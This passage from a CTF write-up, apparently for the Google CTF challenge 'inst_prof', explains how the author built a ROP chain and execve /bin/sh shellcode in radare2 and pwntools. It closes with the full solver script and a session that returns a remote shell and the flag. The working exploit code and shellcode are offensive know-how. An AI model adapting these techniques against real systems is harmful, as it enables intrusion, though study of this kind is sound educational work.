+------------------------+ ;r15
| pop rdi gadget |
+------------------------+
| GOT address |
+------------------------+
And with radare2:
[0x55ba1eb91b16]> dr r13; dr r14; dr r15
0x55ba1ed93000
0x55ba1ed930a0
0x55ba1ed930d2
[0x55ba1eb91b16]> pxq 0x40 @ r14
0x55ba1ed930a0 0x000055ba1ed93000 0x4850ec8948c03148 .0...U..H1.H..PH
0x55ba1ed930b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x55ba1ed930c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x55ba1ed930d0 0x55ba1eb91bc3050f 0x55ba1ed930000000 .......U...0...U
[0x55ba1eb91b16]> pxq 0x20 @ r15
0x55ba1ed930d2 0x000055ba1eb91bc3 0x000055ba1ed93000 .....U...0...U..
0x55ba1ed930e2 0x0000000000000000 0x0000000000000000 ................
[0x55ba1eb91b16]> pd 2 @ [r15]
0x55ba1eb91bc3 5f pop rdi
0x55ba1eb91bc4 c3 ret
Note that the value in r15 is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the first pxq output at r14, which is why I repeat the pxq at the r15 register, where the pop rdi gadget and GOT address are more easily seen and recognized.
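The smeared qwords in the first dump can be reproduced in a few lines. This standalone Python 3 sketch lays out the last two shellcode bytes followed by the first two chain entries, then reads the same memory at an 8-byte-aligned offset and at the chain's real start, two bytes later (the variable names are only illustrative; the addresses are the ones from the dump above):

```python
import struct

tail_of_shellcode = b"\x0f\x05"  # syscall, the last two shellcode bytes
chain = struct.pack("<QQ", 0x55ba1eb91bc3, 0x55ba1ed93000)

# Memory as it sits from 0x55ba1ed930d0 onward, zero padded.
mem = tail_of_shellcode + chain + b"\x00" * 6

aligned = struct.unpack_from("<QQ", mem, 0)  # what pxq @ r14 shows on this row
shifted = struct.unpack_from("<QQ", mem, 2)  # what pxq @ r15 shows

print([hex(q) for q in aligned])
print([hex(q) for q in shifted])
```

The aligned read mixes the 0f 05 bytes into the low end of the gadget address and splits the GOT address across two qwords, while the read at offset 2 recovers both entries cleanly.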
All that's left is to add the mprotect call and our shellcode address to the ROP chain.
To do that, we have to calculate the offset from [rsp] to make_page_executable:
[0x7f88cc42b000]> ? sym.make_page_executable - [rsp]
-248 0xffffffffffffff08 01777777777777777777410 17179869184.0G fffff000:0f08 -248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 -248.0 -248.000000f -248.000000
[0x7f88cc42b000]> ? [rsp] - sym.make_page_executable
248 0xf8 0370 248 0000:00f8 248 "\xf8" 11111000 248.0 248.000000f 248.000000
Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8 to get the address of make_page_executable:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
    p.send("\x49\xff\xcd" + ret) #dec r13
And then add this to our ROP chain:
p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13
Now the second stack + rop chain looks like this:
+--------------------------------+ ;r14
| GOT address |
+--------------------------------+
| |
| Shellcode |
| |
+--------------------------------+ ;r15
| pop rdi gadget |
+--------------------------------+
| GOT address |
+--------------------------------+
| make_page_executable gadget |
+--------------------------------+
We simply need to get our shellcode address at the end of this ROP chain, and then set rsp to the start of our ROP chain.
#save current second stack pointer into r13:
p.send("\x4d\x89\xfd" + ret) #mov r13, r15
#advance pointer 3 qwords
for x in range(0x18):
    p.send("\x49\xff\xc5" + ret) #inc r13
#point r14 to our shellcode
for x in range(0x8):
    p.send("\x49\xff\xc6" + ret) #inc r14
#and write shellcode address here:
p.send("\x4d\x89\x75\x00") #mov [r13], r14
I had originally tried mov [r15+0x18], [r14+0x8], however it turns out you can't do two memory dereferences in a single mov instruction, so I ended up removing (unnecessarily) both displacements by advancing each pointer into place and then using explicit movs. I could have avoided working with the second stack pointer (through r13) and simply used mov [r15+0x18], r14, however at the time I didn't notice this.
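For the curious, the simpler mov [r15+0x18], r14 would also have fit in the 4-byte slot. The sketch below (standalone Python 3; mov_store_disp8 is a hypothetical helper, not part of any library) derives the encoding from the x86-64 ModRM rules for the r8 to r15 registers. I have not run it through rasm2; it is checked only against the three mov encodings already used in the solver script.

```python
REGS = {"r8": 0, "r9": 1, "r10": 2, "r11": 3,
        "r12": 4, "r13": 5, "r14": 6, "r15": 7}


def mov_store_disp8(base, disp, src):
    """Encode `mov [base + disp8], src` for 64-bit registers r8..r15.

    r12 as a base register needs an extra SIB byte, which this sketch
    does not handle. Only non-negative 8-bit displacements are accepted.
    """
    if base == "r12":
        raise ValueError("r12 as base needs a SIB byte")
    if not 0 <= disp <= 0x7f:
        raise ValueError("displacement must fit in 0..0x7f")
    rex = 0x4d                                   # REX.W + REX.R + REX.B
    modrm = (0b01 << 6) | (REGS[src] << 3) | REGS[base]  # mod=01: disp8 form
    return bytes([rex, 0x89, modrm, disp])       # 0x89: mov r/m64, r64


print(mov_store_disp8("r15", 0x08, "r13").hex())  # used in the script
print(mov_store_disp8("r15", 0x18, "r14").hex())  # the shortcut
```

As with the other full 4-byte stores, there would be no room for a ret, so the instruction would repeat on every loop iteration and simply write the same value each time.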
Now the second stack should be set up like so:
+--------------------------------+
| GOT address |
+--------------------------------+ ;r14
| |
| Shellcode |
| |
+--------------------------------+ ;r15
| pop rdi gadget |
+--------------------------------+
| GOT address |
+--------------------------------+
| make_page_executable gadget |
+--------------------------------+ ;r13
| <shellcode address> |
+--------------------------------+
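The layout in the diagram can be written down as a short standalone sketch (Python 3, stdlib only). It rebuilds the four chain entries from a single GOT address using the offsets measured earlier; build_chain and the constant names are hypothetical, and the GOT value is the one from the verification run in this writeup.

```python
import struct

GOT_OFFSET = 0x2014e8            # return address -> GOT
POP_RDI_OFFSET = 0xab            # return address -> pop rdi; ret
MAKE_PAGE_EXEC_OFFSET = -0xf8    # return address -> make_page_executable
SHELLCODE_LEN = 42


def build_chain(ret_addr, got_addr, shellcode_addr):
    """Pack the four qwords that rsp will walk through."""
    return struct.pack(
        "<QQQQ",
        ret_addr + POP_RDI_OFFSET,         # 1. ret lands here: pop rdi
        got_addr,                          # 2. popped into rdi (page aligned)
        ret_addr + MAKE_PAGE_EXEC_OFFSET,  # 3. marks the GOT page executable
        shellcode_addr,                    # 4. mprotect's ret jumps here
    )


got = 0x56103a180000
ret_addr = got - GOT_OFFSET
second_stack = got + 0xa0                # r14 before the final adjustment
shellcode_addr = second_stack + 8        # after the saved GOT qword
chain_addr = shellcode_addr + SHELLCODE_LEN  # r15

chain = build_chain(ret_addr, got, shellcode_addr)
print(hex(chain_addr))
print([hex(q) for q in struct.unpack("<QQQQ", chain)])
```

In the real exploit these values are never computed on the attacker's side; they are assembled inside the target's registers, which is why no information leak is needed.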
And we verify:
[0x7f0e471a5000]> dr r13; dr r14; dr r15
0x56103a1800ea
0x56103a1800a8
0x56103a1800d2
[0x7f0e471a5000]> pxq 0x60 @ r14 - 0x8
0x56103a1800a0 0x000056103a180000 0x4850ec8948c03148 ...:.V..H1.H..PH
0x56103a1800b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x56103a1800c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x56103a1800d0 0x561039f7ebc3050f 0x56103a1800000000 .....9.V.....:.V
0x56103a1800e0 0x561039f7ea200000 0x56103a1800a80000 .. ..9.V.....:.V
0x56103a1800f0 0x0000000000000000 0x0000000000000000 ................
[0x7f0e471a5000]> pxq 0x30 @ r15
0x56103a1800d2 0x0000561039f7ebc3 0x000056103a180000 ...9.V.....:.V..
0x56103a1800e2 0x0000561039f7ea20 0x000056103a1800a8 ..9.V.....:.V..
0x56103a1800f2 0x0000000000000000 0x0000000000000000 ................
[0x7f0e471a5000]> pd 2 @ [r15]
0x561039f7ebc3 5f pop rdi
0x561039f7ebc4 c3 ret
[0x7f0e471a5000]> pd 6 @ [r15 + 0x10]
| ;-- make_page_executable:
| 0x561039f7ea20 55 push rbp
| 0x561039f7ea21 ba05000000 mov edx, 5
| 0x561039f7ea26 be00100000 mov esi, 0x1000 ; rsi
| 0x561039f7ea2b 4889e5 mov rbp, rsp
| 0x561039f7ea2e 5d pop rbp
`=< 0x561039f7ea2f e9ecfdffff jmp sym.imp.mprotect
[0x7f0e471a5000]> pd 16 @ [r15 + 0x18]
;-- r14:
0x56103a1800a8 4831c0 xor rax, rax
0x56103a1800ab 4889ec mov rsp, rbp
0x56103a1800ae 50 push rax
0x56103a1800af 4889e2 mov rdx, rsp
0x56103a1800b2 48bbff2f6269. movabs rbx, 0x68732f6e69622fff
0x56103a1800bc 48c1eb08 shr rbx, 8
0x56103a1800c0 53 push rbx
0x56103a1800c1 4889e7 mov rdi, rsp
0x56103a1800c4 50 push rax
0x56103a1800c5 52 push rdx
0x56103a1800c6 4889e2 mov rdx, rsp
0x56103a1800c9 50 push rax
0x56103a1800ca 57 push rdi
0x56103a1800cb 4889e6 mov rsi, rsp
0x56103a1800ce b03b mov al, 0x3b ; ';' ; 59
0x56103a1800d0 0f05 syscall
I use the pd commands above to illustrate that each entry at r15 (save for the GOT address) points to the appropriate address in the executable for our ROP chain.
The last pd at [r15 + 0x18] shows my disassembled shellcode. I had to update my shellcode for this challenge to set rsp to point back at the original stack space stored in rbp (the mov rsp, rbp at 0x56103a1800ab) because the GOT was no longer marked as writable (which the stack needs to be, since I used push instructions in my shellcode).
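One detail of the disassembly that is easy to miss is how the "/bin/sh" string gets onto the stack. The movabs loads the string with a leading 0xff byte, and the shr by 8 then drops that byte while shifting a zero terminator in at the top. A standalone Python 3 sketch of the same arithmetic follows; the stated motivation (keeping NUL bytes out of the encoded shellcode) is an assumption, since this writeup does not say why the shellcode is written that way.

```python
import struct

imm = 0x68732f6e69622fff     # operand of movabs rbx, ...
rbx = imm >> 8               # shr rbx, 8

encoded = struct.pack("<Q", imm)  # bytes as they appear inside the shellcode
pushed = struct.pack("<Q", rbx)   # bytes that push rbx places on the stack

print(encoded)
print(pushed)

EXECVE = 0x3b                # value loaded into al before syscall
print(EXECVE)
```

The immediate as encoded contains no zero byte, while the value actually pushed is the NUL-terminated path, and 0x3b (59) is the execve system call number on x86-64 Linux.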
All that's left is to load our ROP chain address in r15 into rsp, and watch it rain shell:
p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret
At this point I tested locally and got a shell, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.
The Sweet, Sweet Solution
I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.
Something I found interesting about the solution for this challenge is that, unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the r12 register to leak data (albeit in a slightly obfuscated manner) with the subsequent call to write() that the program made.
Also, I now know that pwntools has an asm() function that will simplify my life in the future ;)
#!/usr/bin/env python2
from pwn import *
from time import sleep
from IPython import embed

ret = "\xc3"
testing = True
if testing:
    p = process("./inst_prof")
    #p = remote("127.0.0.1", 9090)
else:
    p = remote("inst-prof.ctfcompetition.com", 1337)
#context.timeout = 0.2
sleep(5.5)

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
    incCmd = '\x49\xff\xc7' #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

def shiftR15Qword():
    for x in range(8):
        p.send("\x49\xff\xc7\xc3") #inc r15

def main():
    #read initial output:
    print(p.readline())
    #now program is waiting for our 4 bytes
    #first we create our "2nd stack" where we'll store our ROP
    #chain:
    #get text section reference:
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    #constant offset from text.seg.ref to GOT:
    #[rsp] + 0x2014e8 == GOT
    #go 0xa0 further than that to get to blank section
    #total offset == 0x2014e8 + 0xa0 == 0x201588
    #get offset into r14 (r14 is 0 right now):
    p.send("\x49\x01\xf6" + ret) #add r14, rsi #rsi == 0x1000
    #now double r14 9 times:
    for x in range(0x9):
        p.send("\x4d\x01\xf6" + ret) #add r14, r14
    #now r14 is 0x200000, add another 0x1000:
    p.send("\x49\x01\xf6" + ret) #add r14, rsi
    #0x588 left
    #r11 seems to be 0x246 all the time....
    for x in range(2):
        p.send("\x4d\x01\xde" + ret) #add r14, r11
    #0x5c + 0xa0 left:
    for x in range(0x5c):
        p.send("\x49\xff\xc6" + ret) #inc r14
    #now we have GOT Address, save it:
    p.send("\x4d\x01\xf5" + ret) #add r13, r14
    #clear r14:
    p.send("\x4d\x31\xf6" + ret) #xor r14, r14
    for x in range(0xa0):
        p.send("\x49\xff\xc6" + ret) #inc r14
    #now copy to r15:
    p.send("\x4d\x89\xef" + ret) #mov r15, r13
    #now add r15, r14:
    p.send("\x4d\x01\xf7" + ret) #add r15, r14
    #save second stack pointer
    p.send("\x4d\x89\xfe" + ret) #mov r14, r15
    #get r15 past the qword reserved for the GOT address
    shiftR15Qword()
    #now lets write our shellcode:
    writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f' + \
        '\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52' + \
        '\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')
    #save GOT address at [r14]:
    p.send("\x4d\x89\x2e" + ret) #mov [r14], r13
    #now we need pop rdi gadget
    #pop rdi == [rsp] + 0xab
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xab):
        p.send("\x49\xff\xc5" + ret) #inc r13
    #save pop addr on rop stack:
    p.send("\x4d\x89\x2f" + ret) #mov [r15], r13
    #save addr of region to be mprotected as 1st rop gadget arg:
    p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
    p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13
    #now we need to call mprotect and jump to shellcode:
    #mprotect is [rsp] - 0xf8
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xf8):
        p.send("\x49\xff\xcd" + ret) #dec r13
    #push mprotect gadget:
    p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13
    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15
    #advance pointer 3 qwords
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13
    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14
    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14
    #embed()
    #now we set rsp == r15 and let it "rip"..heh
    p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret
    p.interactive()

if __name__ == "__main__":
    main()
And here is what it looked like running it:
-> % ./solver.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
initializing prof...ready
[*] Switching to interactive mode
b\x10\x00\x00\x00\x00\x00\x00Y\x00\x00...
...<redacted lots of bytes>...
...\x00\x00\x00\x00\x00�\x00\x00\x00\x00\x00\x00\x11\xls
$ ls
flag.txt
inst_prof
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
$ exit
[*] Got EOF while reading in interactive
Post-Exploitation
Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.
Of course I wouldn't be able to do this without the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.
Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.
Until next time!
-Chris